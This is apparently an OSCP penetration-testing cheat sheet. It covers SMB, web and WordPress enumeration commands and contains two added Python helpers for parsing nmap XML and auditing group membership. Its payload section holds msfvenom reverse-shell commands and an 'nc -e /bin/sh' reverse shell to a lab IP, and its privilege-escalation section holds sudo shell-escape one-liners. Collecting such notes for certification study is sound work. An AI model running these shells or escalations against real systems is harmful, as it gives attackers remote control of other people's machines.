# OSCP Consolidated Command Cheat Sheet

###### tags: `OSCP`

## 1. Enumeration

* [nmap](https://hack543.com/nmap-tutorial/)
* [rustscan](https://hack543.com/rustscan-intro/): `rustscan -a 192.168.0.1 --scripts none --ulimit 5000`
* dirsearch: `dirsearch -u http://10.10.10.9/ -e php -x 403,404 -t 50`
* gobuster, with the usual wordlists:
  * `/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`
  * `/usr/share/wordlists/rockyou.txt`

### SMB

* `smbmap -H 192.168.1.40` (enumerate shared folders)
* `smbmap -H 192.168.1.17 -u raj -p 123` (with credentials)
* `smbclient -L 192.168.1.40`
* `nmap --script smb-enum-shares -p139,445 192.168.1.17`
* `nmap --script smb-vuln* 192.168.1.16`
* `nmap -Pn -sV -sC -oA smb_scan 192.168.1.16` (`-oA <basename>` writes `.nmap`, `.gnmap` and `.xml` files with that basename)
* [Reference](https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/)

### FTP

### Web

* `nikto --host=http://mywebsit.com -maxtime=30s`
* `wpscan --url sandbox.local --enumerate ap,at,cb,dbe` ([reference](https://www.itread01.com/hkyxlhk.html))
* `wpscan -e ap --plugins-detection aggressive --url http://backdoor.htb --api-token $WPSCAN_API`
* `feroxbuster -u http://backdoor.htb/wp-content/plugins -w plugins.txt` (plugin scan of `/wp-content/plugins/` through this [wordlist](https://raw.githubusercontent.com/Perfectdotexe/WordPress-Plugins-List/master/plugins.txt))
* dirb / feroxbuster
* `sudo apt install seclists`

### Other tools

* enum4linux
* [oscp-note](https://github.com/AidenPearce369/OSCP-Notes)
* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
* [HackTricks](https://book.hacktricks.xyz/welcome/readme)
* [updog](https://github.com/sc0tfree/updog)
* [LinPEAS - Linux Privilege Escalation Awesome Script](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
* [droopescan](https://github.com/SamJoan/droopescan)
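The enumeration commands above produce a lot of output, and the `-oA` run in the SMB list leaves an `.xml` file behind. As an added example (not part of the original cheat sheet), the script below parses that nmap XML with the standard library, lists the open ports with their detected service, and maps each port to the follow-up step this sheet suggests (web fuzzing for 80/443, SMB share enumeration for 139/445). The XML inside the script is a constructed sample shaped like nmap's output; the host, ports and version strings are made up, and the `FOLLOWUP` table is this example's own mapping.

```python
"""Parse nmap XML output (the .xml file written by -oA) into a port table.

Added example, not part of the original cheat sheet. The sample XML below is
constructed to look like nmap output for a single host; host, ports and
service names are made up.
"""
import xml.etree.ElementTree as ET

# Constructed sample resembling the .xml file that `nmap -sV -oA scan <target>` writes.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -Pn -sV -sC -oA scan 192.168.1.16">
  <host>
    <status state="up"/>
    <address addr="192.168.1.16" addrtype="ipv4"/>
    <hostnames><hostname name="fileserver.example.test" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/><service name="ssh" product="OpenSSH" version="8.2p1"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/><service name="http" product="Apache httpd" version="2.4.41"/>
      </port>
      <port protocol="tcp" portid="139">
        <state state="open"/><service name="netbios-ssn" product="Samba smbd"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open"/><service name="netbios-ssn" product="Samba smbd" version="4.6.2"/>
      </port>
      <port protocol="tcp" portid="3306">
        <state state="closed"/><service name="mysql"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Example-specific mapping from a port to the next enumeration step on this sheet.
FOLLOWUP = {
    21: "ftp",
    80: "web: dirsearch/gobuster/nikto",
    443: "web: dirsearch/gobuster/nikto",
    139: "smb: smbmap/smbclient/enum4linux",
    445: "smb: smbmap/smbclient/enum4linux",
}


def parse_open_ports(xml_text):
    """Return a list of (addr, port, service, product, version) for open ports only."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.findall("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        addr = addr_el.get("addr")
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not worth a follow-up step
            svc = port.find("service")
            rows.append((
                addr,
                int(port.get("portid")),
                svc.get("name", "") if svc is not None else "",
                svc.get("product", "") if svc is not None else "",
                svc.get("version", "") if svc is not None else "",
            ))
    return rows


def suggest_followup(rows):
    """Map each open port to the cheat-sheet step for it, or 'manual' if none is listed."""
    return {port: FOLLOWUP.get(port, "manual") for _, port, *_ in rows}


if __name__ == "__main__":
    rows = parse_open_ports(SAMPLE_NMAP_XML)
    for addr, port, name, product, version in rows:
        print(f"{addr}:{port:<5} {name:<12} {product} {version}".rstrip())
    for port, step in sorted(suggest_followup(rows).items()):
        print(f"  {port} -> {step}")
```

On a real run, replace `SAMPLE_NMAP_XML` with the contents of the `.xml` file from `-oA`; the closed 3306 port in the sample is there to show that only `state="open"` entries are kept.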
## 2. Make payload (msfvenom)

* [Reverse shell generator](https://www.revshells.com/)
* `msfvenom -p windows/shell_reverse_tcp lhost=10.0.2.15 lport=4444 -f exe > shell_reverse_tcp`
* `msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f exe -o /tmp/exploit.exe`, e.g. `msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe -o exploit.exe`
* `/bin/bash -c 'nc 192.168.234.166 1337 -e /bin/sh'`

### PHP backdoor

https://github.com/Arrexel/phpbash

### Spawn an interactive bash shell

`python -c 'import pty; pty.spawn("/bin/bash")'`

### Port Redirection

* https://infinitelogins.com/2020/12/11/tunneling-through-windows-machines-with-chisel/

### File Transfer / downloading files

* https://infinitelogins.com/2020/09/04/windows-file-transfer-cheatsheet/
* [certutil](https://cloud.tencent.com/developer/article/1850744)

### SSH tunnel

Dynamic port forwarding: the SSH server on the internal network starts a SOCKS proxy that is exposed externally on `bind_address:port`; when a client connects to it, the connection is handed to the internal proxy, which makes the corresponding onward connection. [Reference](https://johnliu55.tw/ssh-tunnel.html)

1. Local forwarding: connect to a server and forward `bind_address:port` to `host:port`.
   `ssh -L [bind_address:]<port>:<host>:<host_port> <SSH Server>`
2. Remote forwarding (the listener is opened on the SSH server side instead):
   `ssh -R [bind_address:]<port>:<host>:<host_port> <SSH Server>`
3. Dynamic forwarding (the SOCKS proxy described above):
   `ssh -D [bind_address:]<port> <SSH Server>`

## 3. Privilege Escalation

### Linux

1. `sudo -l` -> `sudo perl -e 'exec "/bin/bash"'`
2. `sudo -l` -> `sudo -u user /bin/bash`
3. docker
4. List sudoers: `grep '^sudo:.*$' /etc/group | cut -d: -f4`
5. [LinEnum](https://github.com/rebootuser/LinEnum)

### Windows

1. [Windows-Exploit-Suggester: run `pip install xlrd==1.2.0` first](https://github.com/AonCyberLabs/Windows-Exploit-Suggester)
2. [JuicyPotato](https://github.com/ohpe/juicy-potato/releases)
3. [PEASS-ng: seems handy](https://github.com/carlospolop/PEASS-ng/releases/tag/20221102)

## ALL

* [HackTricks](https://book.hacktricks.xyz/welcome/readme)
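The Linux privilege-escalation list relies on `grep '^sudo:.*$' /etc/group | cut -d: -f4` to see who is in the sudo group, and names docker as another path. As an added example (not from the cheat sheet), the script below generalizes that one-liner into an audit that an administrator can run on a box: it parses `/etc/group` for several privileged groups at once and also folds in users whose primary group in `/etc/passwd` is one of them, which the grep|cut one-liner misses because the fourth field of `/etc/group` only lists supplementary members. The `PRIVILEGED_GROUPS` tuple and the sample `/etc/group` and `/etc/passwd` contents are constructed for the example.

```python
"""Audit membership of privileged groups from /etc/group and /etc/passwd.

Added example, not from the cheat sheet. It generalizes
`grep '^sudo:.*$' /etc/group | cut -d: -f4` to several groups and also
catches primary-group membership, which that one-liner misses.
Sample file contents below are constructed.
"""

# Groups whose membership is worth auditing (example's own list). `docker` is
# included because the cheat sheet lists it as a privilege-escalation path.
PRIVILEGED_GROUPS = ("root", "sudo", "wheel", "admin", "docker", "adm", "lxd")

# Constructed sample /etc/group contents.
SAMPLE_GROUP = """\
root:x:0:
adm:x:4:syslog,alice
sudo:x:27:alice,bob
docker:x:999:carol
users:x:100:
"""

# Constructed sample /etc/passwd contents. Note that dave's primary GID is 27
# (sudo) even though he is not listed in the sudo line of /etc/group.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/bin/bash
carol:x:1002:1002::/home/carol:/bin/bash
dave:x:1003:27::/home/dave:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
"""


def parse_group(text):
    """Return {group_name: (gid, [supplementary members])} from /etc/group text."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = (int(gid), [m for m in members.split(",") if m])
    return groups


def parse_passwd(text):
    """Return {user: primary_gid} from /etc/passwd text."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")  # name:pw:uid:gid:gecos:home:shell
        users[fields[0]] = int(fields[3])
    return users


def privileged_members(group_text, passwd_text, watch=PRIVILEGED_GROUPS):
    """Return {group: sorted members}, merging supplementary and primary-group membership.

    Groups in `watch` that do not exist on the system are left out.
    """
    groups = parse_group(group_text)
    primary = parse_passwd(passwd_text)
    result = {}
    for name in watch:
        if name not in groups:
            continue
        gid, supplementary = groups[name]
        members = set(supplementary)
        members.update(user for user, pgid in primary.items() if pgid == gid)
        result[name] = sorted(members)
    return result


if __name__ == "__main__":
    for group, members in privileged_members(SAMPLE_GROUP, SAMPLE_PASSWD).items():
        print(f"{group:<8} {', '.join(members) or '(no members)'}")
```

To run it against a live system, read `/etc/group` and `/etc/passwd` with `open(...).read()` in place of the two sample strings; the output for the sample shows `dave` under `sudo`, which the original grep|cut pipeline would not have reported.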